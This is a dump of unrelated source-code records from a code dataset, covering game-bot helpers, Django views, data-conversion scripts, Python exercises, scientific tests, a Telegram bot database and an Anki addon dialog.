range(map_length):\n if karb_map[iter_i][iter_j]:\n distance.append((iter_j - pos_x)**2 + (iter_i - pos_y)**2)\n queue.append((iter_j, iter_i))\n\n sorted_distance, sorted_tuple = insertionSort(distance, queue)\n return sorted_distance, sorted_tuple\n\ndef get_relative_fuel_mine_positions(robot):\n pos_x = robot.me.x\n pos_y = robot.me.y\n fuel_map = robot.get_fuel_map()\n\n map_length = len(fuel_map)\n queue = []\n distance = []\n\n for iter_i in range(map_length):\n for iter_j in range(map_length):\n if fuel_map[iter_i][iter_j]:\n distance.append((iter_j - pos_x)**2 + (iter_i - pos_y)**2)\n queue.append((iter_j, iter_i))\n\n sorted_distance, sorted_tuple = insertionSort(distance, queue)\n return sorted_distance, sorted_tuple\n\ndef get_relative_mine_positions(robot):\n pos_x = robot.me.x\n pos_y = robot.me.y\n fuel_map = robot.get_fuel_map()\n karb_map = robot.get_karbonite_map()\n\n map_length = len(fuel_map)\n queue = []\n distance = []\n\n for iter_i in range(map_length):\n for iter_j in range(map_length):\n if fuel_map[iter_i][iter_j] or karb_map[iter_i][iter_j]:\n distance.append((iter_j - pos_x)**2 + (iter_i - pos_y)**2)\n queue.append((iter_j, iter_i))\n\n sorted_distance, sorted_tuple = insertionSort(distance, queue)\n return sorted_distance, sorted_tuple\n\ndef insertionSort(alist, main_list):\n # Quick hack to guard against the conversion of elements into string while sorting\n for index in range(1, len(alist)):\n currentvalue = alist[index]\n currentvalue_ml = main_list[index]\n position = index\n while position > 0 and alist[position - 1] > currentvalue:\n alist[position] = alist[position-1]\n main_list[position] = main_list[position-1]\n position = position -1 \n alist[position] = currentvalue\n main_list[position] = currentvalue_ml\n return alist, main_list\n\ndef convert_to_decimal(binary_str: str) -> int:\n binary_str = \"0b\" + binary_str\n return int(binary_str, 2)\n\ndef convert_to_binary(dec: int) -> str:\n ary = [\"0\" for i in range(16)]\n itr = 15 # start from last index\n while dec != 0:\n rem = dec%2\n ary[itr] = str(rem)\n itr -= 1\n dec = dec // 2\n return \"\".join(ary)\n","sub_path":"bc19-scaffold/bots/11.FightingBot_Crusader/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136654895","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf8:\n\"\"\"\nClass-based django-filter generic view\n\n\nAUTHOR:\n lambdalisue[Ali su ae] (lambdalisue@hashnote.net)\n \nCopyright:\n Copyright 2011 Alisue allright reserved.\n\nLicense:\n Licensed under the Apache License, Version 2.0 (the \"License\"); \n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unliss required by applicable law or agreed to in writing, software\n distributed under the License is distrubuted on an \"AS IS\" BASICS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n__AUTHOR__ = \"lambdalisue (lambdalisue@hashnote.net)\"\nfrom django.http import Http404\nfrom django.views.generic import View\nfrom django.views.generic.list import MultipleObjectMixin\nfrom django.views.generic.list import MultipleObjectTemplateResponseMixin\n\nfrom django_filters.filterset import FilterSet\n\nclass BaseFilterView(MultipleObjectMixin, View):\n filter_class = None\n\n def get(self, request, *args, **kwargs):\n self.object_list = self.get_queryset()\n allow_empty = self.get_allow_empty()\n if not allow_empty and len(self.object_list) == 0:\n raise Http404(\n _(u\"Empty list and '%(class_name)s.allow empty' is \"\n u\"False.\") % {'class_name': self.__class__.__name__})\n context = self.get_context_data(request=request,\n object_list=self.object_list)\n return self.render_to_response(context)\n \n def get_filter_class(self):\n \"\"\"get filter_class\"\"\"\n if self.filter_class:\n return self.filter_class\n elif self.model:\n meta = type(\n 'Meta', (object,), {'model': self.model})\n return type(\n '%sFilterSet' % self.model._meta.object_name,\n (FilterSet,), {'Meta': meta})\n else:\n raise TypeError(\n u\"\"\"BaseFilterView must be used with either model or \"\"\"\n u\"\"\"filter_class\"\"\")\n\n def get_context_data(self, **kwargs):\n request = kwargs.pop('request')\n filter_class = self.get_filter_class()\n filterset = filter_class(request.GET or None, self.get_queryset())\n kwargs['filter'] = filterset\n return super(BaseFilterView, self).get_context_data(**kwargs)\n\nclass FilterView(MultipleObjectTemplateResponseMixin, BaseFilterView):\n \"\"\"\n Render some list of objects with filter, set by `self.model` or\n `self.queryset`.\n `self.queryset` can actually be any iterable of items, not just a queryset.\n \"\"\"\n template_name_suffix = '_filter'\n","sub_path":"django_filters/generic/classbased.py","file_name":"classbased.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603721894","text":"import os\nimport numpy as np\nfrom PIL import Image\n# root = '/TOSHIBA EXT/radar_data/train'\n\ndef image_save(name):\n\tI=Image.open(name)\n\timg=np.asarray(I)\n\t# img_save=np.zeros((501,501))\n\t# for i in range(500):\n\t# \tfor j in range(500):\n\t# \t\timg_save[i,j]=img[i,j,0]\n\treturn img\n\ndef npy(path):\n\tnpy=[]\n\tfor i in os.listdir(path):\n\t\timg = []\n\t\tfor j in os.listdir(path+i):\n\t\t\timg_j=image_save(path+i+'/'+j)\n\t\t\timg.append(img_j)\n\t\tnpy.append(img)\n\tnpy=np.array(npy)\n\treturn npy\n\npath='/Volumes/TOSHIBA EXT/radar_data/train/test/'\nimage_npy=npy(path)\nnp.save('/Volumes/TOSHIBA EXT/radar_data/train/npy/test.npy',image_npy)","sub_path":"code/Image_data_improve.py","file_name":"Image_data_improve.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381505606","text":"#coding: utf-8\nimport argparse\n\ndef parse_args():\n \n parser = argparse.ArgumentParser('test!!!')\n parser.add_argument('--infile', dest=\"data_file\", help='Input data JSON file.')\n parser.add_argument('--outfile', dest=\"result_file\", help='Output result Json file.')\n \n return parser.parse_args()\n\ndef main(args):\n \n data = open(args.infile,\"r\")\n result = open(args.outfile,\"w\")\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","sub_path":"阅读理解/model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"568853921","text":"\"\"\"\n1) 다음 list 에서 10 과 30 사이의 숫자 중 홀수만 골라 출력하라.\n xlist = [-5, 5, 10, 12, 13, 14, 15, 25, 30, 40, 55, 100]\n\"\"\"\nxlist = [-5, 5, 10, 12, 13, 14, 15, 25, 30, 40, 55, 100]\n\nfor n in xlist:\n if n >= 10 and n <= 30:\n if n % 2 == 1:\n print(n)\n\n\"\"\"\n2) 다음 영어 문장에서 너(you)는 몇번 나오는가 ?\n \"You don't go to school on Saturday. I want you be happy.\n I miss you very much. You don't forget me\"\n\"\"\"\ns = \"You don't go to school on Saturday. I want you be happy. I miss you very much. You don't forget me\"\n\ns = s.lower()\nprint(s.count(\"you\"))\n\n\"\"\"\n3) 파이썬 강좌의 수강생 목록은 다음과 같다. 어떤 사람이 수강생 목록에 존재하는지\n check 하는 함수를 작성하라.\n 목록에 존재하면 True, 존재하지 않으면 False 를 반환한다.\n\n 학생부 : [\"김철수\", \"홍길동\", \"문재인\", \"김정은\", \"트럼프\", \"성춘향\"]\n\"\"\"\ndef check_list(lst, name):\n if name in lst:\n return True\n else:\n return False\n\nstudents = [\"김철수\", \"홍길동\", \"문재인\", \"김정은\", \"트럼프\", \"성춘향\"]\n\nprint(check_list(students, \"홍길동\"))\n\n\"\"\"\n4) 다음의 주민번호 리스트에서 남, 녀 별로 90 년생 이후 출생자를 골라내라.\n\"\"\"\nid_list = ['920801-1041798', '800902-2048746', '971010-1023987', '871203-2014987',\n '820801-1041798', '900902-2048746', '941010-1023987', '971203-2014987']\n\nman = []\nlady = []\n\nfor id in id_list:\n if id[:2] >= '90' and id[7] == '1':\n man.append(id)\n else:\n lady.append(id)\n\nprint('남성 =', man)\nprint('여성 =', lady)\n","sub_path":"chapter12_practice.py","file_name":"chapter12_practice.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"492369262","text":"def icmp(a,b):\n global s\n if s.index(a)<=s.index(b):\n return True\n else:\n return False\n\ndef strsort(l,r):\n if l>=r:\n return\n i=l\n j=r\n global t_in_s\n tmp=t_in_s[i]\n while(i x[1])',\n 'near((x[1]-0.25)*(x[1]-0.75), 0) && ((0.25-tol) < x[0]) && ((0.75+tol) > x[0])']\n walls = ['( %s )' % w for w in walls]\n \n chi = CompiledSubDomain(' || '.join(walls), tol=1E-10)\n surfaces = MeshFunction('size_t', omega, 2, 0)\n chi.mark(surfaces, 1)\n\n gamma = EmbeddedMesh(surfaces, 1)\n\n A = np.array([0.5, 0.5, 0.0])\n B = np.array([0.5, 0.5, 1.0]) \n lmbda = StraightLineMesh(A, B, 2*n) # The curve\n\n V3 = FunctionSpace(omega, 'CG', 1)\n V2 = FunctionSpace(gamma, 'CG', 2)\n V1 = FunctionSpace(lmbda, 'CG', 1)\n \n u1 = TrialFunction(V1)\n v3 = TestFunction(V3)\n\n dx_ = Measure('dx', domain=gamma)\n a = inner(Extension(u1, gamma, 'uniform'), Trace(v3, gamma))*dx_\n\n A = ii_assemble(a)\n\n # Now check action\n f1h = interpolate(f1, V1)\n x = A*f1h.vector()\n\n f3h = interpolate(f3, V3)\n result = f3h.vector().inner(x)\n\n true = assemble(inner(f3, f1)*dx_)\n\n error = abs(true - result)\n\n return gamma.hmin(), error, f3h\n\n# --------------------------------------------------------------------\n\nif __name__ == '__main__':\n from test_surf_avg import analyze_convergence\n from functools import partial\n import sympy as sp\n\n ns = (4, 8, 16, 32)\n \n # Exact, exact\n f3, f1 = Constant(2), Constant(3)\n get_error = partial(test_ET, f3=f3, f1=f1)\n rate, error = analyze_convergence(ns, get_error)[2:]\n assert error < 1E-12\n\n # Exact, exact\n f3, f1 = Expression('x[0] - x[2] + 2*x[1]', degree=3), Expression('x[2]', degree=1)\n get_error = partial(test_ET, f3=f3, f1=f1)\n rate, error = analyze_convergence(ns, get_error)[2:]\n assert error < 1E-12\n\n # Exact, exact\n f3, f1 = Expression('sin(pi*(x[0] - x[2] + 2*x[1]))', degree=3), Expression('sin(2*pi*x[2])', degree=3)\n get_error = partial(test_ET, f3=f3, f1=f1)\n rate, error = analyze_convergence(ns, get_error)[2:]\n assert rate > 1\n","sub_path":"src_lm3d1d/test_ET_coupling.py","file_name":"test_ET_coupling.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13512721","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2020-2023 Alibaba Group Holding Limited.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport json\nimport pickle\n\nimport numpy as np\nimport pyarrow as pa\n\nif pickle.HIGHEST_PROTOCOL < 5:\n import pickle5 as pickle # pylint: disable=import-error\n\n\ndef normalize_dtype(\n dtype, dtype_meta=None\n): # pylint: disable=too-many-return-statements\n '''Normalize a descriptive C++ type to numpy.dtype.'''\n if isinstance(dtype, np.dtype):\n return dtype\n if dtype in ['i32', 'int', 'int32', 'int32_t']:\n return np.dtype('int32')\n if dtype in ['u32', 'uint', 'uint_t', 'uint32', 'uint32_t']:\n return np.dtype('uint32')\n if dtype in [int, 'i64', 'int64', 'long long', 'int64_t']:\n return np.dtype('int64')\n if dtype in ['u64', 'uint64', 'uint64_t']:\n return np.dtype('uint64')\n if dtype in ['float32']:\n return np.dtype('float32')\n if dtype in ['float']:\n return np.dtype('float')\n if dtype in ['double', 'float64']:\n return np.dtype('double')\n if dtype.startswith('str'):\n return np.dtype(dtype_meta)\n return dtype\n\n\ndef normalize_cpptype(dtype): # pylint: disable=too-many-return-statements\n if dtype.name == 'int32':\n return 'int'\n if dtype.name == 'uint32':\n return 'uint32'\n if dtype.name == 'int64':\n return 'int64'\n if dtype.name == 'uint64':\n return 'uint64'\n if dtype.name == 'float32':\n return 'float'\n if dtype.name == 'float64':\n return 'double'\n return dtype.name\n\n\ndef normalize_arrow_dtype( # noqa: C901, pylint: disable=too-many-return-statements\n dtype,\n):\n if dtype in ['bool']:\n return pa.bool_()\n if dtype in ['int8_t', 'int8', 'byte']:\n return pa.int8()\n if dtype in ['uint8_t', 'uint8', 'char']:\n return pa.uint8()\n if dtype in ['int16_t', 'int16', 'short']:\n return pa.int16()\n if dtype in ['uint16_t', 'uint16']:\n return pa.uint16()\n if dtype in ['int32_t', 'int32', 'int']:\n return pa.int32()\n if dtype in ['uint32_t', 'uint32']:\n return pa.uint32()\n if dtype in ['int64_t', 'int64', 'long']:\n return pa.int64()\n if dtype in ['uint64_t', 'uint64']:\n return pa.uint64()\n if dtype in ['half']:\n return pa.float16()\n if dtype in ['float', 'float32']:\n return pa.float32()\n if dtype in ['double', 'float64']:\n return pa.float64()\n if dtype in [\n 'string',\n 'std::string',\n 'std::__1::string',\n 'std::__cxx11::string',\n 'str',\n ]:\n return pa.large_string()\n if dtype in ['large_list']:\n return pa.large_list(pa.int32())\n if dtype in ['large_list']:\n return pa.large_list(pa.uint32())\n if dtype in ['large_list']:\n return pa.large_list(pa.int64())\n if dtype in ['large_list']:\n return pa.large_list(pa.uint64())\n if dtype in ['large_list']:\n return pa.large_list(pa.float())\n if dtype in ['large_list']:\n return pa.large_list(pa.double())\n if dtype in ['null', 'NULL', 'None', None]:\n return pa.null()\n raise ValueError('Unsupported data type: %s' % dtype)\n\n\ndef build_buffer(client, address, size):\n if size == 0:\n return client.create_empty_blob()\n existing = client.find_shared_memory(address)\n if existing is not None:\n return client.get_meta(existing)\n buffer = client.create_blob(size)\n buffer.copy(0, address, size)\n return buffer.seal(client)\n\n\ndef build_numpy_buffer(client, array):\n if array.dtype.name != 'object':\n if not array.flags['C_CONTIGUOUS']:\n array = np.ascontiguousarray(array)\n address, _ = array.__array_interface__['data']\n return build_buffer(client, address, array.nbytes)\n else:\n payload = pickle.dumps(array, protocol=5)\n buffer = client.create_blob(len(payload))\n buffer.copy(0, payload)\n return buffer.seal(client)\n\n\ndef default_json_encoder(value):\n if isinstance(value, (np.integer, np.floating)):\n return value.item()\n raise TypeError\n\n\ndef to_json(value):\n return json.dumps(value, default=default_json_encoder)\n\n\ndef from_json(string):\n return json.loads(string)\n\n\ndef expand_slice(indexer):\n if isinstance(indexer, slice):\n return range(indexer.start, indexer.stop, indexer.step)\n else:\n return indexer\n\n\ndef str_to_bool(s):\n if s is None:\n return False\n if not isinstance(s, str):\n s = str(s)\n return s.lower() in [\n 'true',\n '1',\n 't',\n 'y',\n 'yes',\n 'yeah',\n 'yup',\n 'certainly',\n 'uh-huh',\n ]\n\n\n__all__ = [\n 'normalize_dtype',\n 'normalize_cpptype',\n 'normalize_arrow_dtype',\n 'build_buffer',\n 'build_numpy_buffer',\n 'to_json',\n 'from_json',\n 'expand_slice',\n 'str_to_bool',\n]\n","sub_path":"python/vineyard/data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219023458","text":"import sqlite3\r\nimport datetime\r\n\r\ndef new_base():\r\n connect = sqlite3.connect('new_base3.db')\r\n cursor = connect.cursor()\r\n connect.commit()\r\n return cursor, connect\r\n\r\n\r\ndef table_user(message, name, email, phone):\r\n cursor, connect = new_base()\r\n user_id = message.chat.id\r\n cursor.execute(\"INSERT INTO users VALUES(?, ?, ?, ?)\", (user_id, name, email, phone))\r\n connect.commit()\r\n\r\ndef check_in_field(user_id):\r\n cursor, connect = new_base()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS users( \r\n id integer PRIMARY KEY,\r\n name_user text,\r\n email_user text,\r\n phone_user text\r\n )\"\"\")\r\n connect.commit()\r\n cursor.execute(f\"SELECT id FROM users WHERE ID = {int(user_id)}\")\r\n data = cursor.fetchone()\r\n return data\r\n\r\ndef table_data_user(message, org_inn, photo_1, photo_2, doc_pers_data):\r\n cursor, connect = new_base()\r\n cursor.execute(\"\"\"PRAGMA foreign_keys=ON\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS data_user(\r\n chat_id INTEGER,\r\n date TEXT,\r\n time TEXT,\r\n org_inn TEXT,\r\n photo_passport_1 BLOB, \r\n photo_passport_2 BLOB,\r\n doc_personal_data BLOB,\r\n FOREIGN KEY (chat_id) REFERENCES users(id)\r\n )\"\"\")\r\n\r\n user_id = message.chat.id\r\n dt_obj= datetime.datetime.now()\r\n dt_string = dt_obj.strftime(\"%d-%b-%Y %H:%M:%S\")\r\n date_now = str(dt_string.split()[0])\r\n time_now = str(dt_string.split()[1])\r\n cursor.execute(\"INSERT INTO data_user VALUES(?, ?, ?, ?, ?, ?, ?)\", (user_id,date_now ,time_now, org_inn, photo_1, photo_2, doc_pers_data))\r\n connect.commit()\r\n\r\n\r\n\r\n\r\n","sub_path":"tg_bot/data_base.py","file_name":"data_base.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247906944","text":"import numpy\nimport sys\n\nclass two_set_classify:\n \n train = []\n test = []\n w = [0.]*57\n b = 0.\n feature_name = []\n feature = [[0 for x in range(4001)] for y in range(57)]\n classify = [0.]*4001\n\n def read_train(self,file_name):\n with open(file_name) as data_file:\n for line in data_file:\n self.train.append(line.strip().split(','))\n data_file.close()\n for i in range (4001):\n for j in range (57):\n self.feature[j][i]=self.train[i][j+1]\n self.classify[i] = self.train[i][58]\n \n\n def f_wb(self,x):\n z = 0.\n for j in range (57):\n z=z+self.w[j]*float(x[j])\n z=z+self.b\n f_wb=1/(1+numpy.exp(-z))\n return(f_wb) \n \n def logistic_regression(self,n,eta):\n for i in range(n):\n S=[1.]*57\n for j in range (57):\n s=0.\n for k in range(4001):\n s=s+(float(self.classify[k])-self.f_wb(self.train[k][1:58]))*float(self.train[k][j+1])\n S[j]=S[j]+s*s\n self.w[j]=self.w[j]+eta*(1.0/(S[j]**0.5))*s\n\n def write_w(self,file_name):\n f = open(file_name, 'w+')\n f.write('id,label\\n')\n for i in range(57):\n f.write(str(w[i]))\n f.write('\\n')\n \n def output(self,input_file,output_file):\n with open(input_file) as data_file:\n for line in data_file:\n self.w[i]=float(line)\n data_file.close()\n f = open(output_file, 'w+')\n f.write('id,label\\n')\n for k in range(600):\n f.write(str(k+1))\n f.write(',')\n if(self.f_wb(self.test[k][1:58])>0.5):\n f.write('1\\n')\n else:\n f.write('0\\n')\n f.close()\n\nmodel = two_set_classify()\nmodel.read_train(sys.argv[1])\nmodel.logistic_regression(110, 5)\nmodel.write_w(sys.argv[2])\n\n\n\n","sub_path":"hw2/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219847002","text":"import sys,os\nsys.path.append(os.path.abspath('..')) \nfrom Base import BaseProcessor\nclass ImageFeatureExtractor(BaseProcessor.BaseProcessor):\n def __init__(self, config, DBP):\n super(ImageFeatureExtractor, self).__init__()\n sys.path.append(os.path.abspath('..'))\n self.config = config\n self.DBP = DBP\n\n def checkDBP(self):\n DBP_info = self.DBP.project_name+'; '\n DBP_info +=self.DBP.subtask_name+'; '\n DBP_info +=self.DBP.configTableName+'; '\n DBP_info +=self.DBP.metaDataTableName+'; '\n DBP_info +=self.DBP.apkTreeTableName +'; '\n DBP_info +=self.DBP.rawApkForestName+'; '\n print(DBP_info)\n\n def info(self):\n info='''\n Desc:\n 提取特征模块,从生成好的应用树中得到图片路径对其提取特征\n transform csv records to dicts\n \n feed meanful record\n write dicts file\n show dicts length\n \n methods list:\n def runTransform(self,operator='',params=[]):\n if operator == 'extif':\n Example:\n IF extif spm\n IF extif hog\n\n Update:\n 使用queryAllPath中获取图片的id-path对,该id-path对相当于mRNA\n 依据该mRNA对该id-path对进行翻译,生成pictureList相当于pro.\n 最后对pictureList进行特征提取,转存到文件中\n '''\n print(info)\n def transcription(self):\n import numpy as np\n idUpath = self.DBP.queryAllPath()\n path = np.array(idUpath)[:,1] # 取半条链作为mRNA\n path = [self.config['INPUT_DATA_DIR'] + x for x in path]\n return path #最后返回的是list型\n\n\n def extractHOG(self,pictureList,size):\n # S3 获取图片的方向梯度直方图\n def getHOG(picture):\n from skimage import feature as ft\n from skimage import io\n features,hogImage = ft.hog(picture, orientations=9, pixels_per_cell=(16, 16), cells_per_block=(2, 2), visualize=True)\n #io.imshow(hogImage)\n #io.show()\n return features\n\n featureList = []\n for picture in pictureList:\n featureList.append(getHOG(picture.reshape(size)))\n\n return featureList\n \n #extractIF:提取图像特征\n def extractIF(self,method,pictureList,size): \n extractIFFun = ''\n if method == 'hog':\n return self.extractHOG(pictureList,size)\n elif method =='hsv':\n # S4 获取图片的颜色直方图\n pass\n elif method == 'spm':\n #from . import spm\n from ImageFeatureExtract.spm import spm\n from importlib import reload\n reload(spm)\n return spm.getSPM(pictureList,self.config['SPM_CODE_BOOK_PATH']) \n elif method == 'scspm':\n from scspm import scspm\n from importlib import reload\n reload(scspm)\n return scspm.getSCSPM(pictureList,self.config['SPM_CODE_BOOK_PATH']) \n elif method == 'cnn-resnet':\n from ImageFeatureExtract.cnn import testResnetFeatureExtractor\n from importlib import reload\n reload(testResnetFeatureExtractor)\n return testResnetFeatureExtractor.runExtract(pictureList)\n elif method == 'cnn-densnet':\n from ImageFeatureExtract.cnn import testDensnetFeatureExtractor\n from importlib import reload\n reload(testDensnetFeatureExtractor)\n return testDensnetFeatureExtractor.runExtract(pictureList)\n elif method == 'cnn-vgg':\n from ImageFeatureExtract.cnn import testVGGFeatureExtractor\n from importlib import reload\n reload(testVGGFeatureExtractor)\n return testVGGFeatureExtractor.runExtract(pictureList)\n elif method == 'ae':\n from ImageFeatureExtract.ae import testAutoEncoder\n from importlib import reload\n reload(testAutoEncoder)\n return testAutoEncoder.runExtract(pictureList)\n else:\n print('no method selected!')\n \n #runCluster:运行最佳参数的聚类\n def runExtractor(self,operator=[],params=[]):\n runLog = []\n runLog.append(operator)\n if operator == 'info' or operator=='':\n self.info()\n if operator == 'usedefault':\n self.makeSureExists(self.config['EXTRACTED_FEATURE_PATH']) \n self.copyFile(self.config['RAW_ROOT']+'pretrain_data/ExtractedFeature-default.txt',\n self.config['EXTRACTED_FEATURE_PATH'])\n if operator == 'extif':\n # 获得mRNA\n pictureList = self.transcription()\n imageMatrix,imageSize = self.loadPictureData(pictureList,'cv2')\n #提取全部图像的特征\n if 'cnn' in params:\n # cnn专用\n extractedFeatures = self.extractIF(params,pictureList,imageSize)\n else:\n extractedFeatures = self.extractIF(params,imageMatrix,imageSize)\n self.writeVector(extractedFeatures,self.config['EXTRACTED_FEATURE_PATH'])#+'-'+params)\n self.DBP.updateMetaData({\"$set\":{\"imagesize\":str(imageSize[0])+'x'+str(imageSize[1]),\"ifmethod\":params,\"ifdim\":len(extractedFeatures[0])}})\n runLog.append('len extractedFeatures:%d' % len(extractedFeatures))\n\n print('\\n---------------------------runLog:----------------------------\\n',runLog)\n return runLog\n","sub_path":"MisleadingWidgetsDetective_Algo/ImageFeatureExtract/ImageFeatureExtractor.py","file_name":"ImageFeatureExtractor.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"497170249","text":"import numpy as np\nimport os\n\ncosmo1 = {'name': 'cosmo1', 'Omega_m': 0.3, 'Omega_b': 0.05, 'h': 0.67, 'n_s': 0.96, 'sigma8': 0.8, 'w0': -1.0, 'wa': 0.0, 'omega_nu': 0.0}\ncosmo2 = {'name': 'cosmo2', 'Omega_m': 0.3, 'Omega_b': 0.05, 'h': 0.67, 'n_s': 0.96, 'sigma8': 0.8, 'w0': -1.0, 'wa': 0.0, 'omega_nu': 0.001}\n\ndef get_bm(cosmo, kind):\n cosmoname = cosmo['name']\n f = open(\"xstar.dat\", \"w\")\n h = cosmo['h']\n ns = cosmo['n_s']\n s8 = cosmo['sigma8']\n w0 = cosmo['w0']\n wa = cosmo['wa']\n om = cosmo['Omega_m']*h**2\n ob = cosmo['Omega_b']*h**2\n onu = cosmo['omega_nu']\n f.write(f'{om} {ob} {s8} {h} {ns} {w0} {wa} {onu} 0.0\\n')\n f.write(f'{om} {ob} {s8} {h} {ns} {w0} {wa} {onu} 1.0\\n')\n f.close()\n os.system(f'./P_{kind}/emu.exe')\n for i in range(2):\n os.system(f'mv EMU{i}.txt ../../{cosmoname}_MTII_{kind}_{i}.txt')\n\nget_bm(cosmo1, 'tot')\nget_bm(cosmo1, 'cb')\nget_bm(cosmo2, 'tot')\nget_bm(cosmo2, 'cb')\n","sub_path":"benchmarks/data/codes/CosmicEmuMTII/get_bms.py","file_name":"get_bms.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606543868","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import Http404\n\nfrom django.shortcuts import render, redirect\nfrom django.template.defaultfilters import slugify\n\nfrom collection.forms import HostForm\nfrom collection.models import Host\n\n\ndef index(request):\n hosts = Host.objects.all()\n return render(request, 'index.html', {\n 'hosts': hosts,\n })\n\ndef host_detail(request, slug):\n # grab the object...\n host = Host.objects.get(slug=slug)\n\n # and pass to the template\n return render(request, 'hosts/host_detail.html', {\n 'host': host,\n })\n\n@login_required\ndef edit_host(request, slug):\n # grab the object...\n host = Host.objects.get(slug=slug)\n\n # grab the current logged in user and make sure they're the owner of the host\n if host.user != request.user:\n raise Http404\n\n # set the form we're using...\n form_class = HostForm\n\n # if we're coming to this view from a submitted form, \n if request.method == 'POST':\n # grab the data from the submitted form\n form = form_class(data=request.POST, instance=host)\n\n if form.is_valid():\n # save the new data\n form.save()\n return redirect('host_detail', slug=host.slug)\n\n # otherwise just create the form\n else:\n form = form_class(instance=host)\n\n # and render the template\n return render(request, 'hosts/edit_host.html', {\n 'host': host,\n 'form': form,\n })\n\ndef create_host(request):\n form_class = HostForm\n\n # if we're coming from a submitted form, do this\n if request.method == 'POST':\n # grab the data from the submitted form and apply to the form\n form = form_class(request.POST)\n\n if form.is_valid():\n # create an instance but do not save yet\n host = form.save(commit=False)\n\n # set the additional details\n host.user = request.user\n host.slug = slugify(host.name)\n\n # save the object\n host.save()\n\n # redirect to our newly created host\n return redirect('host_detail', slug=host.slug)\n\n # otherwise just create the form\n else:\n form = form_class()\n\n return render(request, 'hosts/create_host.html', {\n 'form': form,\n })\n\ndef browse_by_name(request, initial=None):\n if initial:\n hosts = Host.objects.filter(\n name__istartswith=initial).order_by('name')\n else:\n hosts = Host.objects.all().order_by('name')\n\n return render(request, 'search/search.html', {\n 'hosts': hosts,\n 'initial': initial,\n })\n\n","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"268006129","text":"# coding: utf-8\n\ndef handle_argument():\n '''handle the argument. '''\n import argparse\n\n description = 'This script is used to convert one encoding file to another encoding file.'\n epilog = \"\"\" \"\"\"\n parser = argparse.ArgumentParser(prog=\"convert_encoding\",\n description=description,\n epilog=epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('infile',\n help='The input file with path, e.g. /data/dept_dict.csv')\n parser.add_argument('--inencode', nargs='?', default='utf-8',\n help='The input file encoding method. The default is utf-8')\n parser.add_argument('outfile',\n help='The input file with path, e.g. /data/out_dept_dict.csv')\n parser.add_argument('--outencode', nargs='?', default='utf-8',\n help='The input file encoding method. The default is utf-8')\n\n return parser\n\n\nparser = handle_argument()\nargs = parser.parse_args()\n\n\ninPath = args.infile\noutPath = args.outfile\n\ninEncode = args.inencode\noutEncode = args.outencode\n\nwith open(inPath, 'r+', encoding=inEncode, errors='ignore') as fIn:\n with open(outPath, 'w+', encoding=outEncode) as fOut:\n # for line in fIn.readlines():\n # fOut.write(line.decode(inEncode).encode(outEncode))\n fOut.writelines(fIn.readlines())\n","sub_path":"spark/scripts/convert_encoding.py","file_name":"convert_encoding.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"94140224","text":"from .dynamath import *\n\n\nclass CustomDialog(QDialog):\n\n def __init__(self, *args, **kwargs):\n super(CustomDialog, self).__init__(*args, **kwargs)\n\n self.dyna_math = DynaMathManager(self)\n\n self.setWindowTitle(\"DynaMath Addon\")\n self.setMinimumSize(500, 500)\n\n self.text_editor = QTextEdit()\n self.output_text = QTextEdit()\n self.saved_texts = ['', '', '', '']\n self.menu_triggered = 1\n\n # menu_triggered | 0 = graphic text ; 1 = question text ; 2 = answer text ; 3 = algorithm text\n\n # TOP TOOLBAR\n action_create = QAction(\"Create new algorithm\", self)\n action_create.triggered.connect(self.makeBold)\n action_edit = QAction(\"Edit existing algorithm\", self)\n action_help = QAction(\"Help\", self)\n\n 